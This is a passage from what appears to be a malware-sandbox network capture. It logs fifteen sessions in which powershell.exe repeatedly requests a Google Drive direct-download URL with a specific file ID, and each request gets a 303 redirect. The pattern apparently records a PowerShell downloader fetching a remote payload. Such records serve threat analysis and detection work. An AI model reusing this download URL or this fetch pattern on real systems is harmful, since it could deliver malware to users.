                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                6 | 192.168.2.4 | 49744 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:46:03 UTC | 121 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:04 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:04 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Cross-Origin-Opener-Policy: same-origin
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-kLft7XF-v7NSQK5aO0uDpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                7 | 192.168.2.4 | 49745 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:46:08 UTC | 121 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:09 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:09 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-C91xlqaOQ0jenHtaNST4aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                8 | 192.168.2.4 | 49746 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:46:13 UTC | 97 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:46:14 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:14 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-lLbVOgxGa3GypC_BcGos-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                9 | 192.168.2.4 | 49747 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:46:19 UTC | 97 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:46:19 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:19 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-fq-lvI5LES2Cy1C02ZAj-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                10 | 192.168.2.4 | 49748 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:46:24 UTC | 97 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:46:24 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:24 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-RPVb1cAl7V7dYVSQj_hgqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                11 | 192.168.2.4 | 49750 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:46:29 UTC | 121 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:29 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:29 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: script-src 'report-sample' 'nonce-CR1rFIDzY1hYyOVBB-vpOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                12 | 192.168.2.4 | 49753 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:46:34 UTC | 121 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:35 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:35 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-m6_sWImcqmY5aJygoDuirQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                13 | 192.168.2.4 | 49754 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:46:39 UTC | 97 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:46:40 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:40 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-629b_qg4LARb0MLL9nmWIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                14 | 192.168.2.4 | 49755 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:46:44 UTC | 121 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:45 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:45 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-MZJ__5oGFMSCuQ0QujlrCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                15 | 192.168.2.4 | 49756 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:46:49 UTC | 121 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:50 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:50 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-ab2vwVTNfJpo5UUQ7mdy8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                16 | 192.168.2.4 | 49757 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:46:55 UTC | 121 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:55 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:55 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-yA4Rk4Eju8tV_VuOgayszA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                17 | 192.168.2.4 | 49759 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:47:00 UTC | 97 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:47:00 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:00 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: script-src 'report-sample' 'nonce-fBooVxGdl02CFZfpVK0NWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                18 | 192.168.2.4 | 49760 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:47:05 UTC | 97 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:47:05 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:05 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-30bz787RwNcuK5VtMrj7qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                19 | 192.168.2.4 | 49761 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:47:10 UTC | 121 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:47:11 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:10 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: script-src 'report-sample' 'nonce-X8iq_tItZrABPDMVomidzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                20 | 192.168.2.4 | 49762 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:47:15 UTC | 121 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:47:16 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:15 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Content-Security-Policy: script-src 'report-sample' 'nonce-2GcyCkDoTLDX6IbdpecL_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
